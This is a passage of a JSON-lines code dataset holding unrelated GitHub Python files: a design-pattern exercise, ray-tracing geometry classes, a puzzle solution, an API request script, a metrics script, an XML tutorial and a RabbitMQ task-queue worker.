defense\n\n # self.game.creatures.append(self)\n\n def __str__(self) -> str:\n return f'{type(self).__name__} ({self.attack}/{self.defense})'\n\n @property\n def attack(self):\n query = Query(self, Attribute.ATTACK, self.initial_attack)\n\n self.game.process_query(self, query)\n\n return query.value\n\n @property\n def defense(self):\n query = Query(self, Attribute.DEFENSE, self.initial_attack)\n\n self.game.process_query(self, query)\n\n return query.value\n\n\nclass Goblin(Creature, CreatureModifier):\n def __init__(self, game, attack=1, defense=1):\n super().__init__(game, attack, defense)\n\n def handle(self, sender, query):\n if sender != self and query.attribute_type == Attribute.DEFENSE:\n query.value += 1\n\n\nclass GoblinKing(Goblin, CreatureModifier):\n def __init__(self, game):\n super().__init__(game, attack=3, defense=3)\n\n def handle(self, sender, query):\n if sender != self and query.attribute_type == Attribute.ATTACK:\n query.value += 1\n super().handle(sender, query)\n\n\nclass Game:\n def __init__(self):\n self.creatures = []\n\n def process_query(self, sender, query):\n for creature in self.creatures:\n creature.handle(sender, query)\n\n\nif __name__ == '__main__':\n game = Game()\n goblin = Goblin(game)\n g2 = Goblin(game)\n g3 = Goblin(game)\n game.creatures.append(goblin)\n game.creatures.append(g2)\n game.creatures.append(g3)\n\n print('Before king (3 goblins')\n print(goblin)\n print(g2)\n print(g3)\n\n print('----------')\n\n king = GoblinKing(game)\n game.creatures.append(king)\n\n print('After king')\n print(king)\n print(goblin)\n print(g2)\n print(g3)\n","repo_name":"adrianopaduam/python_design_patterns","sub_path":"Structural Patterns/Chain of Responsability/03.exercise.py","file_name":"03.exercise.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12320092374","text":"import numpy as np\nimport math\nimport utils\nimport refl_refr\n\n\nclass Primitive:\n def __init__(self, cfg):\n orientation = np.array([cfg['lcs']['h'], cfg['lcs']['p'], cfg['lcs']['r']])\n pos = np.array([cfg['lcs']['x'], cfg['lcs']['y'], cfg['lcs']['z']])\n scale = np.array([cfg['lcs']['sx'], cfg['lcs']['sy'], cfg['lcs']['sz']])\n rotation = utils.get_rotation_matrix(orientation)\n translation = utils.get_translation_matrix(pos)\n scale = utils.get_scale_matrix(scale)\n o2w, w2o = utils.get_o2w_w2o_matrices(translation, rotation, scale)\n self.o2w_ = np.copy(o2w)\n self.w2o_ = np.copy(w2o)\n # self.o2w_tr_ = 
np.copy(np.linalg.inv(self.o2w_.transpose()))\n self.o2w_tr_ = self.o2w_.transpose()\n\n self.color_ = np.array(\n [cfg['material']['color']['r'], cfg['material']['color']['g'], cfg['material']['color']['b']])\n self.material_type_ = refl_refr.MaterialTypes.DIFFUSE\n if ('type' in cfg['material']) is True:\n if cfg['material']['type'] == 'REFLECTION':\n self.material_type_ = refl_refr.MaterialTypes.REFLECTION\n elif cfg['material']['type'] == 'REFLECTION_AND_REFRACTION':\n self.material_type_ = refl_refr.MaterialTypes.REFLECTION_AND_REFRACTION\n self.refr_index_ = 1.0\n if ('refr_index' in cfg['material']) is True:\n self.refr_index_ = cfg['material']['refr_index']\n self.refl_coef_ = 0.5\n if ('refl_coef' in cfg['material']) is True:\n self.refl_coef_ = cfg['material']['refl_coef']\n self.K_d_ = 0.3\n if ('K_d' in cfg['material']) is True:\n self.K_d_ = cfg['material']['K_d']\n self.K_s_ = 0.5\n if ('K_s' in cfg['material']) is True:\n self.K_s_ = cfg['material']['K_s']\n\n def ray2object(self, start_pos, d):\n s = np.copy(start_pos)\n r = np.copy(d)\n\n s = np.append(s, [1.0])\n r = np.append(r, [0.0])\n s = np.matmul(self.w2o_, s)\n s = s / s[3]\n r = np.matmul(self.w2o_, r)\n # r = r / r[3]\n return s[0:3], r[0:3]\n\n def point2world(self, point):\n p = np.copy(point)\n p = np.append(p, [1.0])\n p = np.matmul(self.o2w_, p)\n p = p / p[3]\n return p[0:3]\n\n def normal2world(self, normal):\n n = np.copy(normal)\n n = np.append(n, [0.0])\n n = np.matmul(self.o2w_tr_, n)\n return n[0:3]\n\n def get_all_intersections(self, start_pos, d): # returns list of (point, normal)\n return []\n\n def intersect(self, start_pos, d, color_mode, dist_range=0):\n s, r = self.ray2object(start_pos, d)\n r = r / np.linalg.norm(r)\n intersections = self.get_all_intersections(s, r)\n closest_t = np.inf\n intersection = None\n for elem in intersections:\n t = np.linalg.norm(elem[0] - start_pos)\n if t < closest_t:\n closest_t = t\n intersection = np.copy(elem)\n if intersection is None:\n return None\n p = self.point2world(intersection[0])\n n = self.normal2world(intersection[1])\n n = n / np.linalg.norm(n)\n\n color = None\n if color_mode == utils.ColorModes.NORMAL:\n color = np.abs(n)\n elif color_mode == utils.ColorModes.DISTANCE:\n col = np.linalg.norm(p - start_pos)\n color = col / dist_range\n elif color_mode == utils.ColorModes.UNIFORM:\n color = self.color_\n return [color, p, n]\n\n\nclass Sphere(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.rad_ = cfg['sphere']['r']\n\n def get_all_intersections(self, start_pos, d):\n rad = self.rad_\n # d = dir\n k1 = np.dot(d, d) # == 1\n k2 = 2.0 * np.dot(start_pos, d)\n k3 = np.dot(start_pos, start_pos) - rad ** 2\n discr = k2 ** 2 - 4 * k1 * k3\n if discr >= 0:\n t1 = (-k2 + math.sqrt(discr)) / 2 / k1\n t2 = (-k2 - math.sqrt(discr)) / 2 / k1\n result = []\n if t1 > 0.0:\n result.append((start_pos + t1 * d, self.get_normal(start_pos + t1 * d)))\n if t2 > 0.0:\n result.append((start_pos + t2 * d, self.get_normal(start_pos + t2 * d)))\n return result\n return []\n\n def get_normal(self, p):\n n = np.array([2.0 * p[0], 2.0 * p[1], 2.0 * p[2]])\n return n / np.linalg.norm(n)\n\n\nclass Plane(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.width_ = cfg['plane']['width']\n self.height_ = cfg['plane']['height']\n self.normal_ = np.array([0.0, 0.0, 1.0])\n\n def get_all_intersections(self, start_pos, d):\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n denom = np.dot(d, self.normal_)\n if np.abs(denom) > 
1.0e-5:\n t = np.dot(-start_pos, self.normal_) / denom\n if t < 0.0:\n return []\n p = start_pos + t * d\n if p[0] > 0.5 * self.width_ \\\n or p[0] < -0.5 * self.width_ \\\n or p[1] > 0.5 * self.height_ \\\n or p[1] < -0.5 * self.height_:\n return []\n return [(p, self.normal_)]\n return []\n\n def get_normal(self, p):\n return self.normal_\n\n\nclass Cylinder(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.rad_ = cfg['cylinder']['r']\n self.height_ = cfg['cylinder']['h']\n\n def intersect_with_disks(self, start_pos, d):\n result = []\n rad = self.rad_\n positions = [np.array([0.0, 0.0, 0.5 * self.height_]), np.array([0.0, 0.0, -0.5 * self.height_])]\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n normals = [np.array([0.0, 0.0, 1.0]), np.array([0.0, 0.0, -1.0])]\n for i in range(len(positions)):\n denom = np.dot(d, normals[i])\n if np.abs(denom) <= 1.0e-5:\n return []\n t = np.dot(positions[i] - start_pos, normals[i]) / denom\n if t < 0.0:\n continue\n p = start_pos + t * d\n if (p[0] - positions[i][0]) ** 2 + (p[1] - positions[i][1]) ** 2 <= rad ** 2:\n result.append((p, np.copy(normals[i])))\n return result\n\n def intersect_with_cylinder(self, start_pos, d):\n rad = self.rad_\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n k1 = d[0] ** 2 + d[1] ** 2\n k2 = 2.0 * d[0] * start_pos[0] + 2.0 * d[1] * start_pos[1]\n k3 = start_pos[0] ** 2 + start_pos[1] ** 2 - rad ** 2\n discr = k2 ** 2 - 4 * k1 * k3\n if discr >= 0:\n t = []\n p = []\n t.append((-k2 + math.sqrt(discr)) / 2 / k1)\n t.append((-k2 - math.sqrt(discr)) / 2 / k1)\n p.append(start_pos + t[0] * d)\n p.append(start_pos + t[1] * d)\n result = []\n for i in [0, 1]:\n if -0.5 * self.height_ <= p[i][2] <= 0.5 * self.height_ and t[i] > 0.0:\n result.append((p[i], self.get_normal_for_cylinder(p[i])))\n return result\n return []\n\n def get_all_intersections(self, start_pos, d):\n return self.intersect_with_cylinder(start_pos, d) + self.intersect_with_disks(start_pos, d)\n # return self.intersect_with_disks(start_pos, ray)\n\n def get_normal_for_cylinder(self, p):\n # return np.array([1.0, 0.0, 0.0])\n n = np.array([2.0 * p[0], 2.0 * p[1], 0.0])\n return n / np.linalg.norm(n)\n\n\nclass Cone(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.rad_ = cfg['cone']['r']\n self.height_ = cfg['cone']['h']\n\n def intersect_with_disk(self, start_pos, d):\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n normal = np.array([0.0, 0.0, -1.0])\n denom = np.dot(d, normal)\n if np.abs(denom) > 1.0e-5:\n t = np.dot(-start_pos, normal) / denom\n if t < 0.0:\n return []\n p = start_pos + t * d\n if p[0] ** 2 + p[1] ** 2 <= self.rad_ ** 2:\n return [(p, normal)]\n return []\n\n def intersect_with_cone(self, start_pos, d):\n ratio = self.rad_ / self.height_\n top = np.array([0.0, 0.0, self.height_])\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n k1 = d[0] ** 2 + d[1] ** 2 - (ratio * d[2]) ** 2\n k2 = 2.0 * d[0] * (start_pos[0] - top[0]) + 2.0 * d[1] * (start_pos[1] - top[1]) - 2.0 * (ratio ** 2) * d[2] * (\n start_pos[2] - top[2])\n k3 = (start_pos[0] - top[0]) ** 2 + (start_pos[1] - top[1]) ** 2 - (ratio * (start_pos[2] - top[2])) ** 2\n discr = k2 ** 2 - 4 * k1 * k3\n if discr >= 0:\n t = []\n p = []\n t.append((-k2 + math.sqrt(discr)) / 2 / k1)\n t.append((-k2 - math.sqrt(discr)) / 2 / k1)\n p.append(start_pos + t[0] * d)\n p.append(start_pos + t[1] * d)\n result = []\n for i in [0, 1]:\n if 0.0 <= p[i][2] <= self.height_ and t[i] > 0.0:\n result.append((p[i], 
self.get_normal_for_cone(p[i])))\n return result\n return []\n\n def get_all_intersections(self, start_pos, d):\n return self.intersect_with_disk(start_pos, d) + self.intersect_with_cone(start_pos, d)\n\n def get_normal_for_cone(self, p):\n n = np.array([2.0 * p[0], 2.0 * p[1], -2.0 * p[2] * (self.rad_ / self.height_) ** 2])\n return n / np.linalg.norm(n)\n # return np.array([1.0, 0.0, 0.0])\n\n\nclass Triangle(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.v0_ = np.array([cfg['triangle']['x1'], cfg['triangle']['y1'], cfg['triangle']['z1']])\n self.v1_ = np.array([cfg['triangle']['x2'], cfg['triangle']['y2'], cfg['triangle']['z2']])\n self.v2_ = np.array([cfg['triangle']['x3'], cfg['triangle']['y3'], cfg['triangle']['z3']])\n normal = np.cross(self.v1_ - self.v0_, self.v2_ - self.v0_)\n\n self.normal_ = normal / np.linalg.norm(normal)\n self.d_ = np.dot(self.normal_, self.v0_)\n\n def get_all_intersections(self, start_pos, d):\n # r = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n denom = np.dot(d, self.normal_)\n if np.abs(denom) < 1.0e-5:\n return []\n t = -(np.dot(self.normal_, start_pos) + self.d_) / denom\n if t < 0.0:\n return []\n p = start_pos + t * d\n edge0 = self.v1_ - self.v0_\n vp0 = p - self.v0_\n c0 = np.cross(edge0, vp0)\n if np.dot(self.normal_, c0) < 0:\n return []\n\n edge1 = self.v2_ - self.v1_\n vp1 = p - self.v1_\n c1 = np.cross(edge1, vp1)\n if np.dot(self.normal_, c1) < 0:\n return []\n\n edge2 = self.v0_ - self.v2_\n vp2 = p - self.v2_\n c2 = np.cross(edge2, vp2)\n if np.dot(self.normal_, c2) < 0:\n return []\n return [(p, self.normal_)]\n\n def get_normal(self, p):\n return self.normal_\n","repo_name":"PozigunMikhail/Ray-Tracing","sub_path":"objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":11171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1404066944","text":"import sys\ninput = sys.stdin.readline\n\nsent = input()\n\nops = [] # 연산자만 넣을 리스트\nnums = [] # 숫자만 넣을 리스트\n\n# 숫자와 연산자 분리해서 각각 ops와 nums에 넣어주는 과정\nnum = \"\"\nfor i in range(len(sent)):\n if sent[i].isdigit():\n num += sent[i]\n else:\n nums.append(int(num))\n num = \"\"\n\n if i != len(sent)-1:\n ops.append(sent[i])\n\n\nres = 0\nsums = []\nwhile ops:\n # 연산자 하나씩 pop 해오면서\n op = ops.pop()\n # -가 나오면 이전에 + 묶어줬던 값들의 합 result에서 빼주기\n if op == \"-\":\n sums.append(nums.pop())\n res -= sum(sums)\n sums = []\n # +가 나오면 한꺼번에 묶어서 뺄셈 해주기 위해... 
sums라는 리스트에 추가\n elif op == \"+\":\n sums.append(nums.pop())\n\n# 제일 마지막 값 처리\nres += nums.pop()\n# sums에 값 남아있을 경우 처리\nif sums:\n res += sum(sums)\nprint(res)\n","repo_name":"pseeej/CodingTest","sub_path":"1541.py","file_name":"1541.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"28458860372","text":"import json\nimport requests\n\n\nreq = requests.get(\"https://swapi.dev/api/people/3/\")\nprint(req.status_code)\ncharacter = req.json()\ncharacter = json.loads(character)\nprint(character)\n# print(f\"Here is the new character {character['name']}\" )\n# print(character['birth_year'])\n\n# print(\"Movies appeared in: \")\n\n# for movies in character['films']:\n# req = requests.get(movies)\n# movie = req.json()\n# print(movie['title'])\n\n\n# def get_film_titles(urls):\n# film_titles = []\n# for url in urls:\n# response = requests.get(url)\n# if response.ok:\n# film_data = response.json()\n# film_titles.append(film_data['title'])\n# return film_titles\n\n# # Main function to retrieve character's films\n# def get_character_films(json_data):\n# films_urls = json_data['films']\n# film_titles = get_film_titles(films_urls)\n# return film_titles","repo_name":"neilbhosle/practicefolder","sub_path":"apiRequests.py","file_name":"apiRequests.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38476998723","text":"import numpy as np\nfrom sklearn.metrics import roc_curve\n\npos = 5430\nneg = 495*383-5430\ny1 = np.loadtxt('imcmda.txt',delimiter=',').flatten()\ny2 = np.loadtxt('spm.txt',delimiter=',').flatten()\ny3 = np.loadtxt('nimcgcn.txt',delimiter=',').flatten()\ny4 = np.loadtxt('mclpmda.txt',delimiter=',').flatten()\ny5 = np.loadtxt('gaemda.txt',delimiter=',').flatten()\ny6 = np.loadtxt('nimgmda.txt',delimiter=',').flatten()\nldi = np.loadtxt('m-d.txt',delimiter=',').flatten()\n\ndef count(fpr,tpr,a):\n i = np.abs(fpr-a).argmin()\n fp = fpr[i] * neg\n tn = neg - fp\n tp = tpr[i] * pos\n fn = pos - tp\n return tp,tn,fp,fn\n\ndef binarymetrics(count):\n TP,TN,FP,FN = count\n Sn = TP/(TP+FN) # Sp=Rec\n Sp = TN/(TN+FP)\n Acc = (TN+TP)/(TN+TP+FN+FP)\n Pre = TP/(TP+FP)\n F1 = 2*(Pre*Sn)/(Pre+Sn)\n Mcc = (TP*TN-FP*FN)/np.sqrt((TP+FN)*(TP+FP)*(TN+FN)*(TN+FP))\n return Sp,Sn,Acc,Pre,F1,Mcc\n\ndef test(pred,a,msg):\n fpr,tpr,rocth = roc_curve(ldi,pred)\n Sp,Sn,Acc,Pre,F1,Mcc = binarymetrics(count(fpr,tpr,a))\n print('& {} & {:.4f} & {:.4f} & {:.4f} & {:.4f} & {:.4f} \\\\\\\\'.format(msg,Sn,Acc,Pre,F1,Mcc))\n\ntest(y1,0.05,'IMCMDA')\ntest(y2,0.05,'SPM')\ntest(y3,0.05,'NIMCGCN')\ntest(y4,0.05,'MCLPMDA')\ntest(y5,0.05,'GAEMDA')\ntest(y6,0.05,'NIMGSA')\ntest(y1,0.01,'IMCMDA')\ntest(y2,0.01,'SPM')\ntest(y3,0.01,'NIMCGCN')\ntest(y4,0.01,'MCLPMDA')\ntest(y5,0.01,'GAEMDA')\ntest(y6,0.01,'NIMGSA')","repo_name":"zhanglabNKU/NIMGSA","sub_path":"evaluation/binarymetric.py","file_name":"binarymetric.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"32413012428","text":"from xml.etree.ElementTree import Element, SubElement, dump, ElementTree, parse\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level+1)\n if not elem.tail or 
elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\nnote = Element(\"note\")\nnote.attrib[\"date\"] = \"20180108\"\nnote.attrib[\"editor\"] = \"pycharm\"\n\nto = Element(\"to\")\nto.text = \"Tove\"\nnote.append(to)\n\nSubElement(note,\"to\").text = \"김기정\"\nSubElement(note,\"to\").text = \"김인한\"\nSubElement(note,\"to\").text = \"김상엽\"\n\nSubElement(note, \"from\").text = \"Jani\"\n\nSubElement(note, \"heading\").text = \"Reminder\"\nSubElement(note, \"body\").text = \"Don't forget me this weekend!\"\n\nindent(note)\ndump(note)\nElementTree(note).write(\"note.xml\")\n\ntree = parse(\"note.xml\")\nnote = tree.getroot()\n\n# print(note.get(\"date\")) ## date 호출\n# print(note.get(\"foo\", \"default\")) ## \"foo\"가 없으면 \"default\" 출력\n ## print(note.get(\"foo\")) -> \"foo\"가 없으면 None 출력\nprint(note.keys()) ## 속성 호출\n# print(note.items()) ## (키-값) 쌍 호출\n\n# from_tag = note.find(\"from\")\n# print(from_tag)\n# from_text = note.findtext(\"from\")\n# print(from_text)\n# from_tags = note.findall(\"from\")\n# print(from_tags)\n\nto_tag = note.find(\"to\")\nprint(to_tag.text)\nto_tags = note.findall(\"to\")\n\nfor to_element in to_tags:\n print(to_element.text)\n # print(to_element) ## to_element 로만 적어주면 주소를 출력하는!!\n#\n# print(\"Search from Root\")\n# for parent in note.getiterator():\n# for child in parent:\n# print(child.text)\n#\n# print(\"Search from from\")\n# for child in note.getiterator(\"from\"):\n# print(child.text)\n#\n# print(\"end\")","repo_name":"superbeom97/jumpjump","sub_path":"03_Data_Science/1_Collection/XML/0Basic_XML.py","file_name":"0Basic_XML.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24025968958","text":"import os\nimport sys\nimport json\nimport platform\nimport socket\nimport signal\nimport logging\nimport logging.config\nimport threading\nimport traceback\nimport argparse\nimport multiprocessing\nfrom time import monotonic\nfrom typing import Dict, Any, List, Tuple, Optional, Type, cast # noqa\n\nimport amqp\n\nfrom kuyruk import importer, signals\nfrom kuyruk.kuyruk import Kuyruk\nfrom kuyruk.task import Task\nfrom kuyruk.heartbeat import Heartbeat\nfrom kuyruk.exceptions import Reject, Discard, HeartbeatError, ExcInfoType\n\nlogger = logging.getLogger(__name__)\n\n\nclass Worker:\n \"\"\"Consumes tasks from queues and runs them.\n\n :param app: An instance of :class:`~kuyruk.Kuyruk`\n :param args: Command line arguments\n\n \"\"\"\n def __init__(self, app: Kuyruk, args: argparse.Namespace) -> None:\n self.kuyruk = app\n\n if not args.queues:\n args.queues = ['kuyruk']\n\n def add_host(queue: str) -> str:\n if queue.endswith('.localhost'):\n queue = queue.rsplit('.localhost')[0]\n return \"%s.%s\" % (queue, self._hostname)\n else:\n return queue\n\n self._hostname = socket.gethostname()\n self.queues = [add_host(q) for q in args.queues]\n self._tasks = {} # type: Dict[Tuple[str, str], Task]\n self.shutdown_pending = threading.Event()\n self.consuming = False\n self.current_task = None # type: Optional[Task]\n self.current_args = None # type: Optional[Tuple]\n self.current_kwargs = None # type: Optional[Dict[str, Any]]\n self._heartbeat_error: Optional[Exception]\n\n self._started_at = None # type: Optional[float]\n self._pid = os.getpid()\n\n self._logging_level = app.config.WORKER_LOGGING_LEVEL\n if args.logging_level is not None:\n self._logging_level = args.logging_level\n\n self._max_run_time = 
app.config.WORKER_MAX_RUN_TIME\n if args.max_run_time is not None:\n self._max_run_time = args.max_run_time\n\n self._max_load = app.config.WORKER_MAX_LOAD\n if args.max_load is not None:\n self._max_load = args.max_load\n if self._max_load == -1:\n self._max_load == multiprocessing.cpu_count()\n\n self._reconnect_interval = app.config.WORKER_RECONNECT_INTERVAL\n\n self._threads = [] # type: List[threading.Thread]\n if self._max_load:\n self._threads.append(threading.Thread(target=self._watch_load))\n if self._max_run_time:\n self._threads.append(threading.Thread(target=self._shutdown_timer))\n\n signals.worker_init.send(self.kuyruk, worker=self)\n\n def run(self) -> None:\n \"\"\"Runs the worker and consumes messages from RabbitMQ.\n Returns only after `shutdown()` is called.\n\n \"\"\"\n if self._logging_level:\n logging.basicConfig(\n level=getattr(logging, self._logging_level.upper()),\n format=\"%(levelname).1s %(name)s.%(funcName)s:%(lineno)d - %(message)s\")\n\n signal.signal(signal.SIGINT, self._handle_sigint)\n signal.signal(signal.SIGTERM, self._handle_sigterm)\n if platform.system() != 'Windows':\n # These features will not be available on Windows, but that is OK.\n # Read this issue for more details:\n # https://github.com/cenkalti/kuyruk/issues/54\n signal.signal(signal.SIGHUP, self._handle_sighup)\n signal.signal(signal.SIGUSR1, self._handle_sigusr1)\n signal.signal(signal.SIGUSR2, self._handle_sigusr2)\n\n self._started_at = os.times().elapsed\n\n for t in self._threads:\n t.start()\n\n try:\n signals.worker_start.send(self.kuyruk, worker=self)\n while not self.shutdown_pending.is_set():\n try:\n self._consume_messages()\n break\n except HeartbeatError:\n logger.error(\"Heartbeat error\")\n except (ConnectionError, amqp.exceptions.ConnectionError) as e:\n logger.error(\"Connection error: %s\", e)\n traceback.print_exc()\n\n logger.info(\"Waiting %d seconds before reconnecting...\", self._reconnect_interval)\n self.shutdown_pending.wait(self._reconnect_interval)\n finally:\n self.shutdown_pending.set()\n for t in self._threads:\n t.join()\n\n signals.worker_shutdown.send(self.kuyruk, worker=self)\n\n logger.debug(\"End run worker\")\n\n def _consume_messages(self) -> None:\n with self.kuyruk.channel() as ch:\n # Set prefetch count to 1. 
If we don't set this, RabbitMQ keeps\n # sending messages while we are already working on a message.\n ch.basic_qos(0, 1, False)\n\n self._declare_queues(ch)\n self._consume_queues(ch)\n logger.info('Consumer started')\n self._main_loop(ch)\n\n def _main_loop(self, ch: amqp.Channel) -> None:\n while not self.shutdown_pending.is_set():\n self._pause_or_resume(ch)\n ch.connection.heartbeat_tick()\n try:\n ch.connection.drain_events(timeout=1)\n except socket.timeout:\n pass\n\n def _consumer_tag(self, queue: str) -> str:\n return \"%s:%s@%s\" % (queue, self._pid, self._hostname)\n\n def _declare_queues(self, ch: amqp.Channel) -> None:\n for queue in self.queues:\n logger.debug(\"queue_declare: %s\", queue)\n ch.queue_declare(queue=queue, durable=True, auto_delete=False)\n\n def _pause_or_resume(self, channel: amqp.Channel) -> None:\n if not self._max_load:\n return\n\n try:\n load = self._current_load\n except AttributeError:\n should_pause = False\n else:\n should_pause = load > self._max_load\n\n if should_pause and self.consuming:\n logger.warning('Load is above the treshold (%.2f/%s), ' 'pausing consumer', load, self._max_load)\n self._cancel_queues(channel)\n elif not should_pause and not self.consuming:\n logger.warning('Load is below the treshold (%.2f/%s), ' 'resuming consumer', load, self._max_load)\n self._consume_queues(channel)\n\n def _consume_queues(self, ch: amqp.Channel) -> None:\n self.consuming = True\n for queue in self.queues:\n logger.debug(\"basic_consume: %s\", queue)\n ch.basic_consume(queue=queue, consumer_tag=self._consumer_tag(queue), callback=self._process_message)\n\n def _cancel_queues(self, ch: amqp.Channel) -> None:\n self.consuming = False\n for queue in self.queues:\n logger.debug(\"basic_cancel: %s\", queue)\n ch.basic_cancel(self._consumer_tag(queue))\n\n def _process_message(self, message: amqp.Message) -> None:\n \"\"\"Processes the message received from the queue.\"\"\"\n if self.shutdown_pending.is_set():\n return\n\n try:\n if isinstance(message.body, bytes):\n message.body = message.body.decode()\n description = json.loads(message.body)\n except Exception:\n logger.error(\"Cannot decode message. Dropping. 
Message: %r\", message.body)\n traceback.print_exc()\n message.channel.basic_reject(message.delivery_tag, requeue=False)\n else:\n logger.info(\"Processing task: %r\", description)\n self._process_description(message, description)\n\n def _process_description(self, message: amqp.Message, description: Dict[str, Any]) -> None:\n try:\n task = self._import_task(description['module'], description['function'])\n args, kwargs = description['args'], description['kwargs']\n except Exception:\n logger.error('Cannot import task')\n exc_info = sys.exc_info()\n signals.worker_failure.send(self.kuyruk, description=description, exc_info=exc_info, worker=self)\n message.channel.basic_reject(message.delivery_tag, requeue=False)\n else:\n self._process_task(message, description, task, args, kwargs)\n\n def _import_task(self, module: str, function: str) -> Task:\n if (module, function) in self._tasks:\n return self._tasks[(module, function)]\n\n task = importer.import_object(module, function)\n self._tasks[(module, function)] = task\n return task\n\n def _process_task(\n self,\n message: amqp.Message,\n description: Dict[str, Any],\n task: Task,\n args: Tuple,\n kwargs: Dict[str, Any],\n ) -> None:\n queue = message.delivery_info['routing_key']\n reply_to = message.properties.get('reply_to')\n try:\n result = self._run_task(message.channel.connection, task, args, kwargs)\n except Reject:\n logger.warning('Task is rejected')\n message.channel.basic_reject(message.delivery_tag, requeue=True)\n except Discard:\n logger.warning('Task is discarded')\n message.channel.basic_reject(message.delivery_tag, requeue=False)\n if reply_to:\n exc_info = sys.exc_info()\n self._send_reply(reply_to, message.channel, None, exc_info)\n except HeartbeatError:\n exc_info = sys.exc_info()\n logger.error('Heartbeat error:\\n%s', ''.join(traceback.format_exception(*exc_info)))\n signals.worker_failure.send(\n self.kuyruk,\n description=description,\n task=task,\n args=args,\n kwargs=kwargs,\n exc_info=exc_info,\n worker=self,\n queue=queue)\n raise\n except Exception:\n exc_info = sys.exc_info()\n logger.error('Task raised an exception:\\n%s', ''.join(traceback.format_exception(*exc_info)))\n signals.worker_failure.send(\n self.kuyruk,\n description=description,\n task=task,\n args=args,\n kwargs=kwargs,\n exc_info=exc_info,\n worker=self,\n queue=queue)\n message.channel.basic_reject(message.delivery_tag, requeue=False)\n if reply_to:\n self._send_reply(reply_to, message.channel, None, exc_info)\n else:\n logger.info('Task is successful')\n message.channel.basic_ack(message.delivery_tag)\n if reply_to:\n self._send_reply(reply_to, message.channel, result, None)\n finally:\n logger.debug(\"Task is processed\")\n\n def _run_task(self, connection: amqp.Connection, task: Task, args: Tuple, kwargs: Dict[str, Any]) -> Any:\n hb = Heartbeat(connection, self._on_heartbeat_error)\n hb.start()\n\n self.current_task = task\n self.current_args = args\n self.current_kwargs = kwargs\n try:\n return self._apply_task(task, args, kwargs)\n finally:\n self.current_task = None\n self.current_args = None\n self.current_kwargs = None\n\n hb.stop()\n\n def _on_heartbeat_error(self, error: Exception) -> None:\n self._heartbeat_error = error\n os.kill(os.getpid(), signal.SIGHUP)\n\n @staticmethod\n def _apply_task(task: Task, args: Tuple, kwargs: Dict[str, Any]) -> Any:\n \"\"\"Logs the time spent while running the task.\"\"\"\n if args is None:\n args = ()\n if kwargs is None:\n kwargs = {}\n\n start = monotonic()\n try:\n return task.apply(*args, 
**kwargs)\n finally:\n delta = monotonic() - start\n logger.info(\"%s finished in %i seconds.\" % (task.name, delta))\n\n def _send_reply(\n self,\n reply_to: str,\n channel: amqp.Channel,\n result: Any,\n exc_info: Optional[ExcInfoType],\n ) -> None:\n logger.debug(\"Sending reply result=%r\", result)\n\n reply = {'result': result}\n if exc_info:\n reply['exception'] = self._exc_info_dict(exc_info)\n\n try:\n body = json.dumps(reply)\n except Exception as e:\n logger.error('Cannot serialize result as JSON: %s', e)\n exc_info = sys.exc_info()\n reply = {'result': None, 'exception': self._exc_info_dict(exc_info)}\n body = json.dumps(reply)\n\n msg = amqp.Message(body=body)\n channel.basic_publish(msg, exchange=\"\", routing_key=reply_to)\n\n @staticmethod\n def _exc_info_dict(exc_info: ExcInfoType) -> Dict[str, str]:\n type_, val, tb = exc_info\n return {\n 'type': '%s.%s' % (type_.__module__, cast(Type[BaseException], type_).__name__),\n 'value': str(val),\n 'traceback': ''.join(traceback.format_tb(tb)),\n }\n\n def _watch_load(self) -> None:\n \"\"\"Pause consuming messages if lood goes above the allowed limit.\"\"\"\n while not self.shutdown_pending.wait(1):\n self._current_load = os.getloadavg()[0]\n\n @property\n def uptime(self) -> float:\n if not self._started_at:\n return 0\n\n return os.times().elapsed - self._started_at\n\n def _shutdown_timer(self) -> None:\n \"\"\"Counts down from MAX_WORKER_RUN_TIME. When it reaches zero sutdown\n gracefully.\n\n \"\"\"\n remaining = cast(float, self._max_run_time) - self.uptime\n if not self.shutdown_pending.wait(remaining):\n logger.warning('Run time reached zero')\n self.shutdown()\n\n def shutdown(self) -> None:\n \"\"\"Exits after the current task is finished.\"\"\"\n logger.warning(\"Shutdown requested\")\n self.shutdown_pending.set()\n\n def _handle_sigint(self, signum: int, frame: Any) -> None:\n \"\"\"Shutdown after processing current task.\"\"\"\n logger.warning(\"Catched SIGINT\")\n self.shutdown()\n\n def _handle_sigterm(self, signum: int, frame: Any) -> None:\n \"\"\"Shutdown after processing current task.\"\"\"\n logger.warning(\"Catched SIGTERM\")\n self.shutdown()\n\n def _handle_sighup(self, signum: int, frame: Any) -> None:\n \"\"\"Used internally to fail the task when connection to RabbitMQ is\n lost during the execution of the task.\n\n \"\"\"\n logger.debug(\"Catched SIGHUP\")\n error = self._heartbeat_error\n self._heartbeat_error = None\n raise HeartbeatError from 